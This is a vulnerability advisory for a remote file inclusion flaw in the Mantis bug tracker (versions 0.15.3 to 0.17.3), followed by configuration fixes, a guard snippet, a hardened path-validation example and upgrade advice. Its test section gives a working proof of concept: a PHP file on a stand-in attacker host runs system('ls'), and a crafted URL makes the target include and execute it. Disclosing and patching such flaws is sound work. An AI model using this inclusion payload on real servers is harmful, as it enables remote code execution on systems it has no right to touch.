
Mantis JPGraph Remote File Inclusion Command Execution Vulnerability


Published: 2002-08-28
Updated: 2002-08-28
Severity:
Threat level: ordinary user access privileges
Error type: design error
Exploitation method: server mode

BUGTRAQ ID:5504

Affected systems
Mantis Mantis 0.15.3
Mantis Mantis 0.15.4
Mantis Mantis 0.15.5
Mantis Mantis 0.15.6
Mantis Mantis 0.15.7
Mantis Mantis 0.15.8
Mantis Mantis 0.15.9
Mantis Mantis 0.15.10
Mantis Mantis 0.15.11
Mantis Mantis 0.15.12
Mantis Mantis 0.16.0
Mantis Mantis 0.16.1
Mantis Mantis 0.17.0
Mantis Mantis 0.17.1
Mantis Mantis 0.17.2
Mantis Mantis 0.17.3
Detailed description
Mantis is a web-based bug tracking system.

Mantis relies on included files to provide some of its functionality, such as dynamically generated images, but it does not properly check that the path being included is legitimate. An attacker can therefore specify an arbitrary path, such as a file on the local system or on a remote server, and have arbitrary code contained in that file executed.

Test code
On a server you control, create a file listings.txt containing the following code:

<?php
system('ls');
exit;
?>

Then request the following URL:

http://target/mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F

Solution
In the PHP configuration, set the 'allow_url_fopen' and 'register_globals' options to 'off'.

Alternatively, insert the following at the top of summary_graph_functions.php:

if ( isset($HTTP_GET_VARS['g_jpgraph_path']) ||
     isset($HTTP_POST_VARS['g_jpgraph_path']) ||
     isset($HTTP_COOKIE_VARS['g_jpgraph_path']) ) {
    exit;
}
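The guard above only rejects requests that name the variable. A more robust fix is to take the JPGraph path from local configuration only and validate it before it reaches require(). The following is an added example written for this advisory, not Mantis code or the reporter's fix; the names MANTIS_ROOT and jpgraph_include_path() are assumptions, and only g_jpgraph_path comes from the page.

```php
<?php
// Hardened handling of the JPGraph include path (added example, not Mantis code).
// The weakness: with register_globals on, a request parameter can pre-set
// $g_jpgraph_path, and with allow_url_fopen on, require() will fetch a URL.
// Both are neutralised by deriving the path locally and validating it.

define('MANTIS_ROOT', realpath(__DIR__));   // assumed install directory

// Return a validated local directory (with trailing separator), or null.
function jpgraph_include_path(string $configured, string $allowed_base): ?string
{
    // Reject anything carrying a stream wrapper scheme (http:, ftp:, php:, ...).
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $configured)) {
        return null;
    }
    // Reject embedded NUL bytes, which truncated paths in older PHP releases.
    if (strpos($configured, "\0") !== false) {
        return null;
    }
    $real = realpath($configured);
    $base = realpath($allowed_base);
    if ($real === false || $base === false || !is_dir($real)) {
        return null;
    }
    // The resolved directory must be the allowed base or live beneath it,
    // so "../" sequences cannot escape the install tree.
    if ($real !== $base && strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real . DIRECTORY_SEPARATOR;
}

// Re-assign from a constant so a request-injected $g_jpgraph_path cannot win
// even if register_globals is still enabled on this host.
$g_jpgraph_path = MANTIS_ROOT . '/jpgraph/';

$jpgraph_dir = jpgraph_include_path($g_jpgraph_path, MANTIS_ROOT);
if ($jpgraph_dir === null) {
    // Log the rejected value for the operator; never echo it back to the client.
    error_log('summary_graph: refusing JPGraph path ' . var_export($g_jpgraph_path, true));
    exit;
}
require_once $jpgraph_dir . 'jpgraph.php';
```

The scheme check and the realpath prefix check are the two controls that matter; the register_globals and allow_url_fopen settings from the solution above remain the first line of defence.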

Upgrade:

For every affected version listed above (Mantis 0.15.3 through 0.17.3), upgrade to Mantis 0.17.4a:

http://sourceforge.net/project/showfiles.php?group_id=14963

Related information
Joao Gouveia <tharbad@kaotik.org>.
Reference: http://online.securityfocus.com/archive/1/288116
Related homepage: http://mantisbt.sourceforge.net/index.php3